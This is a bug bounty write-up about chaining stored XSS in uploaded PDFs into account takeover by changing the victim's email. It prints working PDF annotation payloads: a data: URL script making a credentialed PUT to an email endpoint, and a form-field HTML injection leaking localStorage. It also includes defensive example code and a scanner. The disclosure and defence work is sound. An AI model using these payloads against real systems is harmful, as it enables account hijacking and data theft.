From Exploit to Payday: Chaining Stored XSS in PDF Upload to Full Account Takeover via Email Change


Meljith Pereira

“Me, realizing I can take over accounts with just a malicious PDF.”

Not always just a P2 or P4: chained together, these become a P1.

Why This Vulnerability Exists

The author attributes the root cause to the application's PDF processing and rendering stack (PDFTron and PDF.js are named as examples of libraries that can be outdated or misconfigured) not sanitizing active content in uploaded PDFs. Two details in the payloads below matter for the fix. First, neither relies on the PDF's own JavaScript engine: one is a link annotation whose URI action targets a data:text/html URL carrying a script, the other is a text-field value that is raw HTML. Second, the injected fetch uses a relative path with credentials: 'include', so it only achieves anything if the uploaded file is rendered inside the application's own origin with the victim's session cookies attached. Serving user uploads from a separate origin, or as a download rather than inline, would have broken the chain even with the unsanitized content still present.

Overview

This exploit is achieved by uploading a specially crafted PDF file that executes malicious JavaScript code, changing the victim’s email address to the attacker’s. Let’s break this down in simple terms.

What Happened?

The Weak Spot: The file upload feature doesn’t properly check PDF files for malicious content.

The Trick: Attackers upload a PDF that secretly contains harmful JavaScript code.

The Result: When a victim opens this malicious PDF, the script runs in the background and changes the victim’s email address in the system to one controlled by the attacker.

This gives the attacker full control of the victim’s account — no password needed.

How the Attack Works

Step 1: The attacker uploads a PDF file with hidden malicious code.

This PDF contains JavaScript designed to send a request to the company’s API (the endpoint that handles email updates) to change a user’s email address.

Step 2: The victim, thinking the PDF is safe, opens it where the application renders uploads.

Step 3: The script runs in the victim’s browser session with no visible sign. With the link-annotation payload shown later, that happens when the viewer follows the link; with the form-field payload, when the viewer renders the field’s value as HTML.

Step 4: The email address on the victim’s account is replaced with the attacker’s. From this point, the attacker can reset the password, access sensitive data, and lock the victim out.
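The chain ends at an email-change endpoint that accepts a bare PUT from any authenticated session. As an added example (this is not the affected platform's code; the user store, clock and mail outbox are in-memory stand-ins, and every name below is my own), here is how that endpoint's logic can be written so the injected fetch on its own cannot finish the takeover: starting a change requires the current password, completing it requires a single-use token that was delivered to the new address rather than returned to the page, and the old address is warned.

```python
"""Email-change flow that an injected fetch() cannot complete on its own.
Added example, not the affected platform's code; users, clock and outbox
are in-memory stand-ins for the real store, time source and mail system."""
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 15 * 60        # seconds a confirmation token stays valid
PBKDF2_ROUNDS = 200_000


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class EmailChangeService:
    """Two-step change. Step 1 needs the current password and only records
    intent; step 2 needs a single-use, short-lived token that was sent to
    the new address, never returned to the requesting page."""

    def __init__(self, users: dict, now=time.time):
        self.users = users     # user_id -> {"email", "salt", "pw_hash"}
        self.pending = {}      # sha256(token) -> (user_id, new_email, expires_at)
        self.outbox = []       # (recipient, subject, token) in place of real mail
        self.now = now

    def request_change(self, user_id: str, new_email: str, current_password) -> bool:
        user = self.users[user_id]
        # Step-up: a script riding the victim's cookies has the session but
        # not the password, so the PUT from the payload stops here.
        if current_password is None or not hmac.compare_digest(
                hash_password(current_password, user["salt"]), user["pw_hash"]):
            return False
        token = secrets.token_urlsafe(32)
        key = hashlib.sha256(token.encode()).hexdigest()   # store only a hash
        self.pending[key] = (user_id, new_email, self.now() + TOKEN_TTL)
        # Token goes out-of-band to the NEW address; the OLD address gets a
        # warning so an attempt is visible even if step 1 were ever bypassed.
        self.outbox.append((new_email, "confirm-email-change", token))
        self.outbox.append((user["email"], "email-change-requested", None))
        return True

    def confirm_change(self, token: str) -> bool:
        key = hashlib.sha256(token.encode()).hexdigest()
        entry = self.pending.pop(key, None)                # single use
        if entry is None:
            return False
        user_id, new_email, expires_at = entry
        if self.now() > expires_at:
            return False
        self.users[user_id]["email"] = new_email
        return True


def make_service(now=time.time) -> EmailChangeService:
    """Constructed sample store: one victim whose password is 'correct horse'."""
    salt = secrets.token_bytes(16)
    users = {"u1": {"email": "victim@example.com", "salt": salt,
                    "pw_hash": hash_password("correct horse", salt)}}
    return EmailChangeService(users, now=now)


if __name__ == "__main__":
    svc = make_service()
    # What the PDF payload can do: a PUT carrying cookies but no password.
    print("payload attempt accepted:", svc.request_change("u1", "attacker@example.com", None))
    # What the legitimate owner does.
    svc.request_change("u1", "new@example.com", "correct horse")
    token = svc.outbox[0][2]
    print("owner confirmed:", svc.confirm_change(token), "->", svc.users["u1"]["email"])
```

The password check is the control that defeats this particular chain: script injected into the victim's page inherits the session, not the secret the user typed at login. The out-of-band token and the notice to the old address are there for the day the step-up is bypassed some other way.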

Real-Life Example

Here’s the script hidden in the PDF. It fetches a relative URL with credentials: 'include', so the victim’s session cookies ride along; that only works when the PDF is rendered inside the application’s own origin. One caveat for the link-annotation form that follows: current browsers refuse top-level navigation to data: URLs, so whether it fires depends on how the viewer handles link targets; the form-field variant further down does not need a data: URL.

fetch('/api/employees/{id}/email', {
method: 'PUT',
headers: { 'Content-Type': 'application/json' },
credentials: 'include',
body: JSON.stringify({ email: 'attacker@example.com' })
});

8 0 obj
<<
/Type /Annot
/Subtype /Link
/Border [0 0 0]
/Rect [56.693 771.389 133.757 785.189]
/A <<
/Type /Action
/S /URI
/URI (data:text/html,<script>fetch('/api/employees/XXXXXXXXX/email', { method: 'PUT', headers: { 'Content-Type': 'application/json' }, credentials: 'include', body: JSON.stringify({ email: 'attackers-email@email.com' }) }).then(res => res.json()).then(console.log).catch(console.error);</script>)
>>
>>
endobj

Variant: Leaking localStorage From a Form Field

7 0 obj
<<
/Type /Annot
/Subtype /Widget
/FT /Tx
/T (MyField)
/V (">'></div><details/open/ontoggle=confirm(JSON.stringify(localStorage))></details>)
/Rect [ 100 200 150 250 ]
/AA 11 0 R
>>
endobj

Download the full PDF link: https://github.com/meljith-lab/Pdf-xss
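As an added example, not part of the original post or the linked repository, here is a raw-syntax triage scanner for the features both payloads above rely on: URI actions with a data: or javascript: target, form-field values that contain markup, and keys such as /AA, /OpenAction and /JavaScript that attach behaviour to the document. The two sample PDFs are constructed inline to mimic objects 8 and 7 shown above plus a benign link; scan_pdf, read_literal and the key list are my own naming, not anything from the post.

```python
"""Raw-syntax triage of an uploaded PDF for the features the payloads above
use. Added example, not code from the original post; the sample PDFs at the
bottom are constructed inline to mimic the two annotation objects shown."""
import re

BAD_SCHEMES = {b"data", b"javascript", b"vbscript", b"file"}
RISKY_KEYS = re.compile(rb"/(JavaScript|JS|AA|OpenAction|Launch|SubmitForm)\b")
HTML_HINT = re.compile(rb"<\s*/?[a-z!]|\bon[a-z]+\s*=", re.I)


def read_literal(buf: bytes, pos: int) -> bytes:
    """Return the body of the PDF literal string whose '(' sits at buf[pos].
    Parentheses nest (ISO 32000-1 7.3.4.2), so a payload like fetch(...) is
    one string, not several. The character after a backslash is copied
    without affecting nesting; octal escapes are not decoded, which is
    enough for scheme and markup detection."""
    if buf[pos:pos + 1] != b"(":
        raise ValueError("not at a literal string")
    depth, out, i = 0, bytearray(), pos
    while i < len(buf):
        c = buf[i:i + 1]
        if c == b"\\":
            out += buf[i + 1:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth > 1:
                out += c
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
            out += c
        else:
            out += c
        i += 1
    raise ValueError("unterminated literal string")


def scan_pdf(buf: bytes) -> list:
    """Return a list of findings; empty means nothing suspicious at the raw
    level. Object streams are not inflated and encryption is not handled,
    so use this as a triage gate in front of a real parser, not alone."""
    findings = []
    # 1. URI actions: the target's scheme decides whether following the link
    #    lands on a web page or on script (data:, javascript:).
    for m in re.finditer(rb"/URI\s*\(", buf):
        target = read_literal(buf, m.end() - 1)
        scheme = target.split(b":", 1)[0].strip().lower()
        if scheme in BAD_SCHEMES or b"<script" in target.lower():
            findings.append(f"URI action with {scheme.decode(errors='replace')}: "
                            f"target {target[:60]!r}")
    # 2. Form-field values: a viewer that renders /V as HTML turns markup in
    #    the value into stored XSS.
    for m in re.finditer(rb"/V\s*\(", buf):
        value = read_literal(buf, m.end() - 1)
        if HTML_HINT.search(value):
            findings.append(f"form field value contains HTML: {value[:60]!r}")
    # 3. Keys that attach behaviour to open/field events or launch programs.
    for m in RISKY_KEYS.finditer(buf):
        findings.append(f"risky key {m.group(0).decode()} at offset {m.start()}")
    # 4. Object streams can hide any of the above from a raw scan.
    if b"/ObjStm" in buf:
        findings.append("object streams present: inflate before trusting a clean result")
    return findings


# Constructed sample mimicking objects 8 and 7 from the post (not a real upload).
MALICIOUS_PDF = b"""%PDF-1.7
8 0 obj
<< /Type /Annot /Subtype /Link /Border [0 0 0] /Rect [56.693 771.389 133.757 785.189]
/A << /Type /Action /S /URI
/URI (data:text/html,<script>fetch('/api/employees/XXXXXXXXX/email', { method: 'PUT', headers: { 'Content-Type': 'application/json' }, credentials: 'include', body: JSON.stringify({ email: 'attackers-email@email.com' }) }).then(res => res.json()).then(console.log).catch(console.error);</script>) >> >>
endobj
7 0 obj
<< /Type /Annot /Subtype /Widget /FT /Tx /T (MyField)
/V (">'></div><details/open/ontoggle=confirm(JSON.stringify(localStorage))></details>)
/Rect [ 100 200 150 250 ] /AA 11 0 R >>
endobj
%%EOF
"""

# Constructed benign sample: an ordinary https link annotation.
BENIGN_PDF = b"""%PDF-1.7
9 0 obj
<< /Type /Annot /Subtype /Link /A << /S /URI /URI (https://example.com/docs) >> >>
endobj
%%EOF
"""

if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_PDF), ("benign", BENIGN_PDF)):
        print(name, scan_pdf(sample) or "clean")
```

Scanning is one layer. Serving uploads with Content-Disposition: attachment, or from an origin that holds no session cookies, removes the condition the injected fetch needs (a relative URL resolved in the application's origin with credentials: 'include'), and that holds for payload shapes the scanner has never seen.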

Why It’s Dangerous

This is not just a technical bug — it has real-world consequences:

Account Takeover: Attackers gain full access to user accounts by simply swapping out the email.

Sensitive Data Exposure: Personal, financial, or business-critical data stored in the account can be accessed.

Reputation Damage: The trust in the platform is at risk. Users might hesitate to engage with a system that allows such critical exploits.

Scalable Attacks: Any attacker with access to upload PDFs can exploit this vulnerability to target multiple users.

Bonus from writing a good report

Takeaway

This vulnerability reminds us of an important lesson: even trusted file types like PDFs can be dangerous if proper security measures aren’t in place. A small oversight in file handling can have massive consequences for users and the platform.

Follow Me for More Insights

If you enjoyed this write-up and want to learn more about security vulnerabilities, bug bounties, and how to disclose critical issues responsibly, connect with me on LinkedIn or X:

https://www.linkedin.com/in/meljith-pereira/
https://x.com/meljith
